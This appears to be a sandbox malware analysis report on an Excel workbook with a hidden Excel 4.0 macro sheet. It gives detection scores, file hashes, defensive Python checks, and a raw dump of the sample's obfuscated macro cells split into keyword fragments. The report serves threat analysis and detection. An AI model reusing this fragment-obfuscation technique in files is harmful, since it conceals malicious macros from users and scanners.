Analysis Report o515508.xlsm

Overview

Detection

| Field | Value |
|---|---|
| Score | 48 (range 0 - 100) |
| Whitelisted | false |
| Confidence | 100% |
Signatures

Classification: see the signature matches under Signature Overview below.

Malware Configuration: no configs have been found.

Yara Overview (initial sample)

| Rule | Description | Author |
|---|---|---|
| JoeSecurity_XlsWithMacro4 | Yara detected Xls With Macro 4.0 | Joe Security |

Sigma Overview: no Sigma rule has matched.

Signature Overview
Unlabelled entry: File opened.

System Summary

Found abnormal large hidden Excel 4.0 Macro sheet. Evidence categories cited by the report: initial sample (2), binary string, window title, classification label, file created (2), file read, window detected, key opened, file opened.

This is the central finding. The Yara rule above only says the workbook contains Excel 4.0 (XLM) macro cells; this signature says the macro sheet is hidden from the user and is large relative to the visible content, which is how XLM droppers conceal their code. A hidden or very hidden sheet can be confirmed statically from xl/workbook.xml (sheet state attribute) without running the file.
Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier). Evidence categories cited by the report: file opened (1), process information set (33), file source (1).

The Zone.Identifier alternate data stream is the Mark-of-the-Web that makes Office open a downloaded document in Protected View, where Excel 4.0 macros do not run; a document that opens or rewrites its own Zone.Identifier stream is removing that gate. Office itself reads this stream when deciding on Protected View, so an open of Zone.Identifier alone is weak evidence; weigh it together with the 33 process-information-set calls the report pairs with it. Check the mark on the original file before detonation, because once Excel has opened the document the stream may already be gone.
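A check that belongs alongside the signature above, as an added example that is not Joe Sandbox code: read and interpret the Mark-of-the-Web stream on a file before it is opened. On NTFS the mark is the alternate data stream `<file>:Zone.Identifier`, an INI-style text whose ZoneId tells Office whether to open the document in Protected View (ZoneId 3, Internet, and 4, Restricted sites), where Excel 4.0 macros do not run. The sample stream below is constructed, including the example.invalid URLs; the zone names follow the Windows URL security zone numbering, and read_motw() only finds a real stream on Windows with an NTFS volume.

```python
"""Read and interpret a file's Mark-of-the-Web (Zone.Identifier ADS).

Added example for this report, not Joe Sandbox code. The stream body is
an INI file with a [ZoneTransfer] section; Office opens ZoneId 3 and 4
documents in Protected View, so a sample that deletes or rewrites the
stream is removing the gate that would have kept its XLM from running.
"""

# Windows URL security zones (ZoneId values).
ZONES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
         3: "Internet", 4: "Restricted sites"}
PROTECTED_VIEW_ZONES = {3, 4}

# Constructed sample stream; the URLs are placeholders, not from the report.
SAMPLE_STREAM = ("[ZoneTransfer]\r\nZoneId=3\r\n"
                 "ReferrerUrl=https://example.invalid/\r\n"
                 "HostUrl=https://example.invalid/download\r\n")


def parse_zone_identifier(text: str) -> dict:
    """Return the key=value pairs of the [ZoneTransfer] section, {} if absent."""
    section, fields = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "zonetransfer" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    return fields


def classify(fields: dict) -> dict:
    """Map parsed fields to what Office will do with the file."""
    try:
        zone = int(fields.get("ZoneId"))
    except (TypeError, ValueError):
        zone = None                      # no mark or a malformed one
    return {
        "zone_id": zone,
        "zone_name": ZONES.get(zone, "unknown") if zone is not None else "no mark",
        "protected_view": zone in PROTECTED_VIEW_ZONES,
        "referrer": fields.get("ReferrerUrl"),
        "host_url": fields.get("HostUrl"),
    }


def read_motw(path: str) -> dict:
    """Read the ADS on Windows/NTFS; anywhere else, or if absent, report no mark."""
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as fh:
            return classify(parse_zone_identifier(fh.read()))
    except OSError:
        return classify({})


if __name__ == "__main__":
    print(classify(parse_zone_identifier(SAMPLE_STREAM)))
    print(read_motw("o515508.xlsm"))
```

Run read_motw() on the original download rather than on a copy made by a tool that does not preserve streams, and compare with a second call after the document has been opened and closed: a mark that disappears, or a ZoneId rewritten to 0, 1 or 2, is the behaviour the signature describes. PowerShell's `Get-Content -Stream Zone.Identifier` shows the same text.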
Mitre Att&ck Matrix

Only the techniques carrying a count are matched by this sample; the trailing digits in the report are its signature-count superscripts and are given here as printed. The other cells of the report's matrix are the unmatched template entries of each tactic column.

| Tactic | Technique | Signatures |
|---|---|---|
| Execution | Scripting | 11 |
| Defense Evasion | Masquerading | 1 |
| Defense Evasion | Scripting | 11 |
| Defense Evasion | Hidden Files and Directories | 1 |
| Discovery | File and Directory Discovery | 1 |
| Discovery | System Information Discovery | 1 |
Behavior Graph

Screenshots
Antivirus, Machine Learning and Genetic Malware Detection

No antivirus matches for the initial sample, dropped files, unpacked PE files, domains or URLs.

Domains and IPs

None recorded (see Network Behavior below).
General Information

| Field | Value |
|---|---|
| Joe Sandbox Version | 31.0.0 Emerald |
| Analysis ID | 384332 |
| Start date | 08.04.2021 |
| Start time | 22:32:49 |
| Joe Sandbox Product | CloudBasic |
| Overall analysis duration | 0h 4m 4s |
| Hypervisor based Inspection enabled | false |
| Report type | full |
| Sample file name | o515508.xlsm |
| Cookbook file name | defaultwindowsofficecookbook.jbs |
| Analysis system description | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
| New started processes analysed | 3 |
| New started drivers analysed | 0 |
| Existing processes analysed | 0 |
| Existing drivers analysed | 0 |
| Injected processes analysed | 0 |
| Analysis Mode | default |
| Analysis stop reason | Timeout |
| Detection | MAL |
| Classification | mal48.evad.winXLSM@1/6@0/0 |

The classification string encodes the score (mal48), the behaviour tag (evad, evasion signatures matched) and the file class (winXLSM). The run ended by timeout after about four minutes with no network activity, so whatever the macro was meant to do after its loops finished was not observed; the 48/100 score describes what the sandbox saw, not the capability of an obfuscated XLM sheet, and a rerun with a longer timeout is the next step rather than a downgrade.
Simulations

Behavior and APIs: no simulations.

Joe Sandbox View / Context
Created / dropped Files

Six files were created or modified, all by C:\Program Files\Microsoft Office\Office14\EXCEL.EXE. The file name and file type fields are blank for every entry and no previews are given.

File 1

| Field | Value |
|---|---|
| Process | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
| Category | dropped |
| Size (bytes) | 24473 |
| Entropy (8bit) | 7.632163314675518 |
| Encrypted | false |
| SSDEEP | 384:aezUYbGPTpYDBF/FFzlCI4RLRov7D5hvwNN4Q/dXNefGms/fdkVTRV+ypeP:aeXGPTpC/FFzlcVSv35WN6Q/7P//fYTs |
| MD5 | 1DDA2C2F9A759A5DCA312B5368080B35 |
| SHA1 | 24896787AE02B8870FB9B0F494A5257232AD84AC |
| SHA-256 | 2F31438F6E7DD8A88378B77212DB8FCF9C2CD378708B8A8AC487FAC6920A8BC3 |
| SHA-512 | 50BF7D7EC60CC3284DE5A1FB35EF8D4A209108F7F218D5648D74F6BAE5FFD77FFB4D716EE877E8C4993E91665EE3096AEFF459F0A074A0DA098F7F7B42608E3C |
| Malicious | false |
| Reputation | low |

File 2

| Field | Value |
|---|---|
| Process | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
| Category | dropped |
| Size (bytes) | 867 |
| Entropy (8bit) | 4.462861254090878 |
| Encrypted | false |
| SSDEEP | 12:85QscLgXg/XAlCPCHaXtB8XzB/+PbX+WnicvbwbDtZ3YilMMEpxRljKlcTdJP9TK:854/XTd6joYegDv3qfrNru/ |
| MD5 | 10AA3AF5285AF245181C614859CB7142 |
| SHA1 | 1E7D9CB0B709EC9FCDD9F33DF15CF90F9DC620CF |
| SHA-256 | B0DC304406BE28D6F246129D64CCD5E3C0B3C85100BB7237FAA22E428A876F8B |
| SHA-512 | E26355437490C1FB14A70F762896B3A6A784D94105CC9CFD2306E6171554A6AE83FCB09EBF09FA70882F029540FDE44A2686D12CBDB1EA7823A3823407911FF8 |
| Malicious | false |
| Reputation | low |

File 3

| Field | Value |
|---|---|
| Process | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
| Category | dropped |
| Size (bytes) | 76 |
| Entropy (8bit) | 4.254966697884004 |
| Encrypted | false |
| SSDEEP | 3:oyBVomxWBm4pulSQUFpulmxWBm4pulv:djyZu8ufZu1 |
| MD5 | FB510C9B203982D49AD2B0714CDEC89A |
| SHA1 | B669C1E37D40B708CC3A99C70F99B4955CDB8C3F |
| SHA-256 | 1EA30CE694370452701D4E3B8728022A27075AA4277F1ED8624E9FE1A96CBA79 |
| SHA-512 | 7E95C3FF4A7B0C7805E985A885AA8F51B2C6E44D6BB0D5C6BE3584590C382B2DC80196AA49B5457989B58C669C349EA74A9EE49D7F96D19D830477CED967D607 |
| Malicious | false |
| Reputation | low |

File 4

| Field | Value |
|---|---|
| Process | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
| Category | modified |
| Size (bytes) | 2008 |
| Entropy (8bit) | 4.487571205516045 |
| Encrypted | false |
| SSDEEP | 24:8NEbU/XTd6jFykYV7kAe6qRDv3qfdM7dD2NEbU/XTd6jFykYV7kAe6qRDv3qfdMj:8Nf/XT0jFWtjtfQh2Nf/XT0jFWtjtfQ/ |
| MD5 | A2A4A5DD80BD224DC56D6BB1FD4C0B17 |
| SHA1 | 859A310AE08BB8041311B27C7C05698F8997346F |
| SHA-256 | ACFDDD99CF0CD1E23480C7157CAF51BA062CCFD9FD1A4ED0111B9C2D4E82183A |
| SHA-512 | DEA8592D689FAB169824BA4492106A65F7BFB6004DA5128C77062E68368EF8A4A47D9C32CE109733137D8910271AF1841D030F7F4900B38189D3C27412310B53 |
| Malicious | false |
| Reputation | low |

File 5

| Field | Value |
|---|---|
| Process | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
| Category | dropped |
| Size (bytes) | 24476 |
| Entropy (8bit) | 7.632100144810098 |
| Encrypted | false |
| SSDEEP | 384:aezUYbGPTpYDBF/FFzlCI4RLRov7D5hvwNN4Q/dXNefGms/fdkVTRV+ype7:aeXGPTpC/FFzlcVSv35WN6Q/7P//fYTK |
| MD5 | CD81C714877C8967E68D718A2A761EFD |
| SHA1 | 72E7B730DFA1A14E5D4612FFCDAFFBABAFEBDF4C |
| SHA-256 | AFC6F7B974CD130E65579525D1C8697FE09748012917366B2BF265AC880FB1FC |
| SHA-512 | CD9D993D544B11EFBBCEA5EE955AAB696C066FE27A5803FE827C13F5C69A175798EF4435E7617F675FD2C9F254F17CBD231894F1E5820E65203D17A00410A745 |
| Malicious | false |
| Reputation | low |

File 6

| Field | Value |
|---|---|
| Process | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
| Category | dropped |
| Size (bytes) | 330 |
| Entropy (8bit) | 1.4377382811115937 |
| Encrypted | false |
| SSDEEP | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
| MD5 | 96114D75E30EBD26B572C1FC83D1D02E |
| SHA1 | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
| SHA-256 | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
| SHA-512 | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
| Malicious | true |
| Reputation | high, very likely benign file |

Two things worth noting before these hashes go into a blocklist. Files 1 and 5 have near-identical SSDEEP digests (they differ only in the final characters), sizes three bytes apart and the same 7.63 entropy, so they are two versions of one 24 KB compressed payload in the same size class as the 24313-byte sample; they were written by Excel, not by a second stage, since no other process started. File 6 is the only entry the report flags as Malicious, yet its reputation field says "high, very likely benign file"; a 330-byte file with entropy 1.44 and a self-repeating SSDEEP is not an executable payload, and the two fields contradict each other, so treat that flag as unconfirmed.
Static File Info

| Field | Value |
|---|---|
| File name | o515508.xlsm |
| File size | 24313 |
| Entropy (8bit) | 7.640847545115753 |
| MD5 | ccb137d9d5260eaa14873354292dd85c |
| SHA1 | f15f61a2af9d73c8ea16e88e88f91c3012656be7 |
| SHA256 | 8adb6f54e65e375e16f3cda377df2d2a89f6aac15385fab45354240e7f1a13bc |
| SHA512 | cdd975bb5f9b9aaaf9a91a32a5f36cfdbac145c2db2d2cc9bf9b9b1f4bcd80dcf23c2872ad49be9a4df91e0bb499c4ea74a3a1eaaff2f33272d4be6c0cb61313 |
| SSDEEP | 384:6qKzqwNQG8QDZ3gMEHW0rgU/FAi06EYfqL/fUlM9zNpOC:10QG3DZ3LaWOgN62/fxxpOC |
| File Content Preview | PK..........!...B.....M.......[Content_Types].xml ...( |
| Icon Hash | e4e2aa8aa4bcbcac |

The file type and TrID fields are blank in the report. The preview settles the container anyway: "PK" is the ZIP local-file-header signature and [Content_Types].xml is the first member of an Office Open XML package, which matches the OpenXML document type below. The 7.64 entropy is what a deflate-compressed OOXML workbook looks like and is not by itself a sign of packing or encryption.
Static OLE Info

| Field | Value |
|---|---|
| Document Type | OpenXML |
| Number of OLE Files | 1 |
| OLE File | o515508.xlsm |

The indicator fields (Has Summary Info, Application Name, Encrypted Document, Contains Word Document Stream, Contains Workbook/Book Stream, Contains PowerPoint Document Stream, Contains Visio Document Stream, Contains ObjectPool Stream, Flash Objects Count, Contains VBA Macros) are all empty in the report. They describe legacy OLE2 (compound file) containers; in an OpenXML workbook the Excel 4.0 macro cells live in macrosheet parts of the ZIP, which is why the macro content is reported below as Macro 4.0 Code rather than as a VBA project.
Macro 4.0 Code

The report's dump of the Excel 4.0 (XLM) macro sheet follows, one cell per comma-separated field. Almost every cell is a formula that evaluates to a short string literal (shown as ="...", with doubled quotes from CSV escaping), and the literals are fragments of XLM keywords split across cells: =CAL, =FOR, MUL, A(, =RE, TU, RN, XT(), =WHI, LE(, =IND, =IF(, =END, N., TIME and so on, interleaved with junk such as CJNYf and Z5rcS. The few cells that are real formulas are loop control: fzBooSBqIP=A49, =WHILE(AND(fzBooSBqIP<32)), fzBooSBqIP=fzBooSBqIP+1, NcqZSUljpjC=-2, =WHILE(NcqZSUljpjC<267), zoyyxSVtpqE="" and =SUM(375,127). This is the fragmented-string pattern: the sheet contains no complete EXEC, CALL or FORMULA token to match on, and does nothing legible until the loops concatenate the fragments into working formulas at run time. The sandbox run, which ended by timeout with no network activity, reports no dropped executable or URL from that stage, so recovering the real macro means emulating the sheet (or letting it run under instrumentation) and capturing the strings it writes back into cells.
0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,fzBooSBqIP=A49,,-66,"=""=CAL""","=""=O""","=""=HA""","=""live""","=""lev""","=""au""","=""=W""","=""ama""","=""lev""","=""suit""","=""=WHI""","=""ama""","=""=IND""","=""=IF(""","=""am""","=""=E""","=""ele""","=""de""","=""li""","=""su""","=""=END""","=""=NE""","=""=FOR""","=""=NE""","=""=RE""","=""org""","=""in""","=""tr""","=""nort""","=""fi""","=""cou""","=""=org""",,-651,"=""CJNYf""","=""Z5rcS""","=""TOkB8E""","=""e5EpgVe""","=""MrMKGuqkKc""","=""Zi7Ocfi""","=""OLZX54ai""","=""Fe4StaE""","=""U8wvcCMai""","=""W7iIcA0p""","=""eV3lV7""","=""PQmf8n""","=""Yd7CCP""","=""BJHDBf9Hs""","=""RbW8BrSc9""","=""htuXWsV""","=""BSm1h6nR6y""","=""h0uZhNsz""","=""dUarY0""","=""yBx0wM""","=""iJ1jxWs""","=""H9gTW""","=""WHPBau""","=""XZgObOVD""","=""F9sy8H3h""","=""Uem6tIJ""","=""KZjIUzWa""","=""XhwHa""","=""cvt3gS5""","=""GVSasZUms4""","=""gREtR4""","=""bonrBkZ0d"""=WHILE(AND(fzBooSBqIP<32)),,728,"=""L(""""X""","=""N.""","=""LT(""","=""st""","=""it""","=""stri""","=""HI""","=""nd""","=""it""","=""ab""","=""LE""","=""nd""","=""IR""","=""R89C""","=""anda""","=""LSE(""","=""ctri""","=""si""","=""vest""","=""ita""","="".I""","=""XT()""","=""MUL""","=""XT""","=""TU""","=""ani""","=""tran""","=""eat=""","=""he""","=""re""","=""nte""","=""an"""NcqZSUljpjC=-2,,-855,"=""yTYy419""","=""cxkIBe""","=""GDFQv""","=""hio5z""","=""oZTJ1""","=""KvY41aE7V""","=""EHUnr3jI""","=""c7V9bMc""","=""XugndE""","=""TY9W2WG""","=""V11jEuoo""","=""TzieLlRIPB""","=""ISNUxJLqQ""","=""T8ieu2gsB""","=""gFuqGr""","=""lHWgunlCDD""","=""C7yXzVo9DQ""","=""UsCbBUqPY""","=""y7L2W5OY""","=""jecLEqd""","=""dybzMr""","=""tsMf74""","=""ndk1vWD""","=""qDKQ9oVQ""","=""iXxYsQ9""","=""X944FW3""","=""yq8xBRQ""","=""q2FwM""","=""PLvXwTm""","=""XbR980""","=""IxgAkMELq""","=""mi76He""",,64,"=""lcal""","=""TIME""","="")""","=""ock""","=""ra=0""","=""a=""","=""LE(""","=""a=""","=""ra""","=""le=""","=""(am""","=""a=a""","=""ECT""","=""1>""","=""=500""","="")""","=""ci""","=""gns=""","=""ock=""","=""
ble""","=""F()""","=""qsbwbsKxgVuZy""","=""A(""","=""()""","=""RN""","=""za""","=""et=5""","=""1""","=""rn=R""","=""wal""","=""r=R""","=""iza"""fzBooSBqIP=fzBooSBqIP+1,,-63,"=""vvuH9YqrPg""","=""YMJqjLKi""","=""S1RMBAz""","=""J4RegXqT7""","=""u3P0WEn""","=""xjFA1H""","=""sMbPgZF8""","=""RjBRW""","=""JFm4xK""","=""iiKbNfx6""","=""HgIlvL""","=""c4lNPXaarj""","=""yPokB""","=""n0Oh5""","=""Bhjar""","=""hxSL9Jx""","=""Z9liu""","=""kH091""","=""Qx2awGLgn""","=""vXBbg""","=""kP8sdJOQp2""",,"=""CNzpU""","=""j3XAof""","=""P1hvRrI""","=""RbPRJH""","=""tvMHpzzWtj""","=""VOrskgqTY""","=""rTRCv7b""","=""SJxo77P""","=""wutXm8kK""","=""aqkBfhw""",,691,"=""l3""","=""(N""","=""qsbwbsKxgVuZy""","=""=0""","=""qsbwbsKxgVuZy""","=""RO""","=""lev""","=""-1""","=""=le""","=""""""""""""","=""and""","=""man""","=""(A""","=""100""","=""qsbwbsKxgVuZy""","=""qsbwbsKxgVuZy""","=""ty=M""","=""INDE""","=""live""","=""=sui""","=""qsbwbsKxgVuZy""",,"=""sui""","=""qsbwbsKxgVuZy""","=""()""","=""tio""","=""0""","=""qsbwbsKxgVuZy""","=""50""","=""l=""","=""109""","=""tion""""zoyyxSVtpqE=""""",,444,"=""NK7mIwA""","=""QeVI4""",,"=""nrQj0n""",,"=""peY239""","=""krNAkSzO""","=""hvqtv""","=""qFD9e""","=""DELBvlW6""","=""WqKB1FT4""","=""iVXrm""","=""dZ8cZqYP""","=""uBhE85BK""",,,"=""VFvxUKocRL""","=""SVJv3N8t""","=""KaMTdZd""","=""pbo3d8TatL""",,,"=""w6Jm2mNB""",,"=""KYrt62M3P""","=""xnbEG""","=""oKHTxuDKD""",,"=""PrlFx6gJ""","=""q9ya4KW2""","=""k3oFNFu6""","=""LRktfNOR"""=WHILE(NcqZSUljpjC<267),,778,"=""2"""",""","=""OW()""",,"=""qsbwbsKxgVuZy""",,"=""WS(n""","=""itr""","=""qsbwbsKxgVuZy""","=""vitr""","=""qsbwbsKxgVuZy""","=""a<50""","=""da+1""","=""DD""","=""0)""",,,"=""OD(l""","=""X(n""","=""st""","=""tabl""",,,"=""tab""",,"=""qsbwbsKxgVuZy""","=""nal""","=""qsbwbsKxgVuZy""",,"=""C3""","=""17""","=""C1""","=""al()""""=SUM(375,127)",,-890,"=""l7SmJSZ""","=""gSQRs""",,,,"=""vrzcvkM6QW""","=""vODpCWHoj""",,"=""A6LP3""",,"=""f8OEka3""","=""hRUeNVPyL""","=""p1hn6""","=""lyX06XsBks""",,,"=""MbPTd""","=""OWupZ
tL3i""","=""JEuFPs""","=""ACYtBf4P4x""",,,"=""HDtRF""",,,"=""ZiOdqY""",,,"=""bOUeo2R""","=""GweZ
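The static checks behind the "Found abnormal large hidden Excel 4.0 Macro sheet" signature and the fragment pattern in the dump above, as an added example that is not Joe Sandbox code and not the sample's code: locate macrosheet parts through [Content_Types].xml, pair them with the sheet visibility state in xl/workbook.xml, count the sheet's formulas, and score how many of them are bare string literals. The sample file is not on the page, so build_sample() constructs a minimal .xlsm in memory whose fragments are modelled on the dump; the sheet name Macro1, the 20-cell and 60 % thresholds, the DANGEROUS function list and the exact root element of a macrosheet part are this example's assumptions.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from collections import Counter

NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
NS_CT = "http://schemas.openxmlformats.org/package/2006/content-types"
CT_MACROSHEET = "application/vnd.ms-excel.macrosheet+xml"
# XLM functions that run code, reach the OS or rewrite cells at run time (assumed list).
DANGEROUS = ("EXEC", "CALL", "REGISTER", "RUN", "FORMULA", "FORMULA.FILL", "ON.TIME", "FOPEN", "FWRITE")
DANGEROUS_RE = re.compile(r"(?<![A-Z.])(" + "|".join(map(re.escape, DANGEROUS)) + r")\s*\(", re.I)
# A formula whose whole body is one quoted string: ="=CAL" is stored in <f> as "=CAL".
LITERAL_RE = re.compile(r'^"(?:[^"]|"")*"$')


def _xml(zf, name):
    return ET.fromstring(zf.read(name))


def _part(target):
    # Relationship Targets are relative to xl/ unless they start with "/".
    return target.lstrip("/") if target.startswith("/") else "xl/" + target


def analyse_xlsm(data: bytes) -> dict:
    """Per-macro-sheet statistics for an .xlsm image (the bytes of the file)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        # 1. Parts declared as Excel 4.0 macro sheets in [Content_Types].xml.
        macro_parts = {o.get("PartName").lstrip("/")
                       for o in _xml(zf, "[Content_Types].xml").iter(f"{{{NS_CT}}}Override")
                       if o.get("ContentType") == CT_MACROSHEET}
        # 2. r:id -> part, so each sheet's name and visibility pair with its XML.
        rels = {r.get("Id"): _part(r.get("Target")) for r in
                _xml(zf, "xl/_rels/workbook.xml.rels").iter(f"{{{NS_PKG}}}Relationship")}
        sheets = []
        for s in _xml(zf, "xl/workbook.xml").iter(f"{{{NS_MAIN}}}sheet"):
            part = rels.get(s.get(f"{{{NS_R}}}id"))
            if part not in macro_parts:
                continue
            formulas = [f.text for f in _xml(zf, part).iter(f"{{{NS_MAIN}}}f") if f.text]
            literals = sum(1 for f in formulas if LITERAL_RE.match(f.strip()))
            calls = Counter(m.group(1).upper() for f in formulas for m in DANGEROUS_RE.finditer(f))
            sheets.append({"name": s.get("name"), "part": part,
                           "state": s.get("state", "visible"),  # or hidden / veryHidden
                           "formula_cells": len(formulas), "literal_cells": literals,
                           "literal_ratio": literals / len(formulas) if formulas else 0.0,
                           "calls": dict(calls)})
    return {"macrosheets": sheets}


def findings(report: dict) -> list:
    """Flags a triage analyst acts on; the 20-cell / 60 % thresholds are assumptions."""
    out = []
    for s in report["macrosheets"]:
        if s["state"] != "visible":
            out.append(f"{s['name']}: {s['state']} Excel 4.0 macro sheet ({s['part']})")
        if s["formula_cells"] >= 20 and s["literal_ratio"] >= 0.6:
            out.append(f"{s['name']}: {s['literal_ratio']:.0%} of {s['formula_cells']} "
                       "formulas are string literals (fragmented XLM)")
        out.extend(f"{s['name']}: {fn}() x{n}" for fn, n in sorted(s["calls"].items()))
    return out


def build_sample() -> bytes:
    """Constructed .xlsm: a visible worksheet entry and a veryHidden macro sheet Macro1."""
    frags = ["=CAL", "L(", "=FOR", "MUL", "A(", "=RE", "TU", "RN()", "=WHI", "LE(", "=NE", "XT()",
             "=E", "ND.I", "F()", "=O", "N.", "TIME", "=HA", "LT()", "ama", "lev", "suit", "org"]
    ctrl = {1: "WHILE(AND(n&lt;32))", 2: "FORMULA(A1&amp;A2,C1)", 3: "NEXT()"}  # real formulas
    rows = "".join(f'<row r="{i}"><c r="A{i}"><f>"{t}"</f></c>'
                   + (f'<c r="B{i}"><f>{ctrl[i]}</f></c>' if i in ctrl else "") + "</row>"
                   for i, t in enumerate(frags, 1))  # fragments modelled on the dump, not copied
    xlm_rel = "http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet"
    parts = {  # the visible worksheet's own part is omitted: only macro sheets are read
        "[Content_Types].xml": f'<Types xmlns="{NS_CT}"><Override PartName="/xl/workbook.xml" '
            'ContentType="application/vnd.ms-excel.sheet.macroEnabled.main+xml"/><Override '
            f'PartName="/xl/macrosheets/sheet1.xml" ContentType="{CT_MACROSHEET}"/></Types>',
        "xl/_rels/workbook.xml.rels": f'<Relationships xmlns="{NS_PKG}"><Relationship Id="rId1" '
            f'Type="{NS_R}/worksheet" Target="worksheets/sheet1.xml"/><Relationship Id="rId2" '
            f'Type="{xlm_rel}" Target="/xl/macrosheets/sheet1.xml"/></Relationships>',
        "xl/workbook.xml": f'<workbook xmlns="{NS_MAIN}" xmlns:r="{NS_R}"><sheets>'
            '<sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
            '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/></sheets></workbook>',
        # Root element as Excel writes macro sheets (assumption); the cells use the main namespace.
        "xl/macrosheets/sheet1.xml": f'<xm:macrosheet xmlns="{NS_MAIN}" '
            'xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">'
            f'<sheetData>{rows}</sheetData></xm:macrosheet>',
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, xml in parts.items():
            zf.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    print("\n".join(findings(analyse_xlsm(build_sample()))))
```

For a real file, pass `open(path, "rb").read()` to analyse_xlsm(). Real fragmented-XLM sheets usually pad with thousands of empty rows and put the fragments far from A1; the literal ratio does not care where the cells sit, and the part resolver accepts both relative and absolute relationship targets. This finds the concealment, not the payload: recovering the assembled formulas needs an XLM emulator or an instrumented run.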
Network Behavior

No network behavior found.

Code Manipulations

Statistics

CPU Usage, Memory Usage and High Level Behavior Distribution are per-process charts in the interactive report and are not reproduced here.
System Behavior

General

| Field | Value |
|---|---|
| Start time | 22:33:38 |
| Start date | 08/04/2021 |
| Path | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
| Wow64 process (32bit) | false |
| Imagebase | 0x13f200000 |
| File size | 27641504 bytes |
| MD5 hash | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
| Has elevated privileges | true |
| Has administrator privileges | true |
| Programmed in | C, C++ or other language |
| Reputation | high |

The Commandline field is empty in the report. Excel started 49 seconds after the analysis began (22:32:49) and ran as a 64-bit process with administrator privileges in the sandbox image; a macro that checks for, or depends on, elevation will behave differently on a standard-user desktop, so the absence of observed follow-on activity here does not transfer to other environments.

Disassembly